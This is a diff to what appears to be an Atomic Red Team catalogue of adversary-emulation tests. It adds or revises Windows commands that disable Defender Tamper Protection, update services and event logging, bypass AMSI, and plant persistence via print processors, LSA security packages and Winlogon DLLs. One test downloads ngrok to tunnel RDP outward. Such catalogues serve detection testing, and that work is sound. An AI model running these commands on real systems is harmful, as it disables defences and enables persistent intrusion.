-          /v "NoAutoUpdate" /t REG_DWORD /d 0
+          /v "NoAutoUpdate" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -10501,11 +10587,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1
+          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0
+          /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -10520,11 +10606,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "AUOptions" /t REG_DWORD /d 2
+          /v "AUOptions" /t REG_DWORD /d 2 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"
-          /v "AUOptions" /t REG_DWORD /d 3
+          /v "AUOptions" /t REG_DWORD /d 3 /f

          '
        name: command_prompt
@@ -10539,11 +10625,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
-          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1
+          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
-          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0
+          /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f

          '
        name: command_prompt
@@ -10559,11 +10645,11 @@ defense-evasion:
      - windows
      executor:
        command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
-          /t REG_DWORD /d 0
+          /t REG_DWORD /d 0 /f

          '
        cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features"
-          /v "TamperProtection" /t REG_DWORD /d 5
+          /v "TamperProtection" /t REG_DWORD /d 5 /f

          '
        name: command_prompt
@@ -10589,6 +10675,23 @@ defense-evasion:
          '
        name: powershell
        elevation_required: true
+    - name: Allow Simultaneous Download Registry
+      auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+      description: 'A registry modification to allow Simultaneous download in the
+        system.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+        cleanup_command: |
+          reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+          reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+        name: command_prompt
+        elevation_required: true
  T1574.008:
    technique:
      modified: '2023-03-30T21:01:44.781Z'
@@ -12746,15 +12849,16 @@ defense-evasion:
      description: |
        An adversary can disable the ETW Provider of Windows Defender,
        so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+        https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
      supported_platforms:
      - windows
      executor:
        command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" /v Operational /t REG_DWORD /d 0 /f
+          Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f

          '
        cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" /v Operational /f >nul 2>&1
+          Defender/Operational" /v Enabled /f >nul 2>&1

          '
        name: command_prompt
@@ -12764,15 +12868,16 @@ defense-evasion:
      description: |
        An adversary can disable the ETW Provider of Windows Defender,
        so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+        https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
      supported_platforms:
      - windows
      executor:
        command: 'New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" -Name Operational  -PropertyType DWord -Value 0 -Force
+          Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force

          '
        cleanup_command: 'Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
-          Defender" -Name Operational -Force -ErrorAction Ignore
+          Defender/Operational" -Name Enabled -Force -ErrorAction Ignore

          '
        name: powershell
@@ -17472,6 +17577,26 @@ defense-evasion:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
        name: powershell
        elevation_required: true
+    - name: AMSI Bypass - Override AMSI via COM
+      auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
+      description: "With administrative rights, an adversary can disable AMSI via
+        registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
+        by overriding the Microsoft Defender COM object for AMSI and points it to
+        a DLL that does not exist.\nThis is currently being used by AsyncRAT and others.
+        \nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /ve /t REG_SZ /d C:\IDontExist.dll /f
+
+          '
+        cleanup_command: 'REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
+          /f
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -27953,7 +28078,7 @@ privilege-escalation:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -29011,7 +29136,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -29051,7 +29176,43 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
-    atomic_tests: []
+      identifier: T1547.012
+    atomic_tests:
+    - name: Print Processors
+      auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+      description: |
+        Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+        The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+        Note: The test assumes a x64 Windows operating system.
+
+        The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        restart:
+          description: set to 1 if you want the computer to reboot as part of the
+            test
+          type: integer
+          default: 0
+      executor:
+        command: |
+          if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+          net stop spooler
+          Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+          net start spooler
+          if(#{restart}){
+            Restart-Computer
+          }
+        cleanup_command: |
+          net stop spooler
+          rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+          rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+          remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+          net start spooler
+        name: powershell
+        elevation_required: true
  T1574.001:
    technique:
      modified: '2023-03-30T21:01:51.098Z'
@@ -29721,7 +29882,7 @@ privilege-escalation:
          default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
      executor:
        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
-          /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+          /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f

          '
        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
@@ -30527,28 +30688,43 @@ privilege-escalation:
      - Administrator
      identifier: T1547.005
    atomic_tests:
-    - name: Modify SSP configuration in registry
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+        configuration in registry
      auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+      description: |
+        Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+        A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+        name: powershell
+        elevation_required: true
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+        Provider configuration in registry
+      auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
      description: Add a value to a Windows registry SSP key, simulating an adversarial
        modification of those keys.
      supported_platforms:
      - windows
-      input_arguments:
-        fake_ssp_dll:
-          description: Value added to registry key. Normally refers to a DLL name
-            in C:\Windows\System32.
-          type: string
-          default: not-a-ssp
      executor:
        command: |
-          # run these in sequence
-          $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-          $SecurityPackagesUpdated = $SecurityPackages
-          $SecurityPackagesUpdated += "#{fake_ssp_dll}"
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-          # revert (before reboot)
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
        name: powershell
        elevation_required: true
  T1181:
@@ -32062,7 +32238,9 @@ privilege-escalation:
      description: |
        PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+        Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
      supported_platforms:
      - windows
      input_arguments:
@@ -32070,10 +32248,17 @@ privilege-escalation:
          description: Path of notification package to execute
          type: path
          default: C:\Windows\Temp\atomicNotificationPackage.dll
+        function_to_execute:
+          description: Function in notification package to execute
+          type: string
+          default: AtomicTestFunction
      executor:
        command: |
-          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

@@ -43599,7 +43784,7 @@ execution:
      executor:
        command: |
          # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
-          reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
+          reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
          iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
        cleanup_command: |
          Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
@@ -47840,7 +48025,7 @@ persistence:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -48976,7 +49161,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -49079,6 +49264,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -49107,7 +49293,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -49147,7 +49333,43 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
-    atomic_tests: []
+      identifier: T1547.012
+    atomic_tests:
+    - name: Print Processors
+      auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+      description: |
+        Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+        The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+        Note: The test assumes a x64 Windows operating system.
+
+        The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        restart:
+          description: set to 1 if you want the computer to reboot as part of the
+            test
+          type: integer
+          default: 0
+      executor:
+        command: |
+          if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+          net stop spooler
+          Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+          net start spooler
+          if(#{restart}){
+            Restart-Computer
+          }
+        cleanup_command: |
+          net stop spooler
+          rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+          rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+          remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+          net start spooler
+        name: powershell
+        elevation_required: true
  T1574.001:
    technique:
      modified: '2023-03-30T21:01:51.098Z'
@@ -50682,7 +50904,7 @@ persistence:
          default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
      executor:
        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
-          /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+          /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f

          '
        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
@@ -51358,28 +51580,43 @@ persistence:
      - Administrator
      identifier: T1547.005
    atomic_tests:
-    - name: Modify SSP configuration in registry
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+        configuration in registry
      auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+      description: |
+        Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+        A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+        name: powershell
+        elevation_required: true
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+        Provider configuration in registry
+      auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
      description: Add a value to a Windows registry SSP key, simulating an adversarial
        modification of those keys.
      supported_platforms:
      - windows
-      input_arguments:
-        fake_ssp_dll:
-          description: Value added to registry key. Normally refers to a DLL name
-            in C:\Windows\System32.
-          type: string
-          default: not-a-ssp
      executor:
        command: |
-          # run these in sequence
-          $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-          $SecurityPackagesUpdated = $SecurityPackages
-          $SecurityPackagesUpdated += "#{fake_ssp_dll}"
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-          # revert (before reboot)
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
        name: powershell
        elevation_required: true
  T1004:
@@ -53033,7 +53270,9 @@ persistence:
      description: |
        PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+        Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
      supported_platforms:
      - windows
      input_arguments:
@@ -53041,10 +53280,17 @@ persistence:
          description: Path of notification package to execute
          type: path
          default: C:\Windows\Temp\atomicNotificationPackage.dll
+        function_to_execute:
+          description: Function in notification package to execute
+          type: string
+          default: AtomicTestFunction
      executor:
        command: |
-          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

@@ -61245,7 +61491,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -61266,6 +61512,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -64051,6 +64298,48 @@ command-and-control:
          Set-Location PathToAtomicsFolder
          .\T1572\src\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
        name: powershell
+    - name: run ngrok
+      auto_generated_guid: 4cdc9fc7-53fb-4894-9f0c-64836943ea60
+      description: 'Download and run ngrok. Create tunnel to chosen port.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        api_token:
+          description: ngrok API
+          type: string
+          default: N/A
+        port_num:
+          description: port number for tunnel
+          type: integer
+          default: 3389
+        download:
+          description: link to download ngrok
+          type: string
+          default: https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download ngrok
+
+          '
+        prereq_command: 'if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: |
+          New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
+          Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
+          Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
+      executor:
+        command: "C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken #{api_token}
+          | Out-Null\nStart-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
+          tcp #{port_num} } | Out-Null\nStart-Sleep -s 5 \nStop-Job -Name Job1 | Out-Null\n"
+        cleanup_command: |
+          Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
+          Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
  T1483:
    technique:
      x_mitre_platforms:
@@ -67005,7 +67294,7 @@ collection:
          dir
    - name: Compress Data and lock with password for Exfiltration with 7zip
      auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
-      description: 'Note: Requires 7zip installation
+      description: 'Note: This test requires 7zip installation

        '
      supported_platforms:
@@ -67028,7 +67317,7 @@ collection:
          '
        get_prereq_command: |
          echo Downloading 7-zip installer
-          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2301-x64.exe" #{7zip_installer}
          #{7zip_installer} /S
      executor:
        name: command_prompt
@@ -67039,6 +67328,10 @@ collection:
          echo "This file will be encrypted" > .\encrypted_file.txt
          "#{7zip_exe}" u archive.7z *txt -pblue
          dir
+        cleanup_command: 'rmdir /s /Q $PathToAtomicsFolder\T1560.001\victim-files
+          >nul 2>&1
+
+          '
  T1113:
    technique:
      modified: '2023-03-30T21:01:39.967Z'
@@ -71900,7 +72193,58 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1570
+    atomic_tests:
+    - name: Exfiltration Over SMB over QUIC (New-SmbMapping)
+      auto_generated_guid: d8d13303-159e-4f33-89f4-9f07812d016f
+      description: |
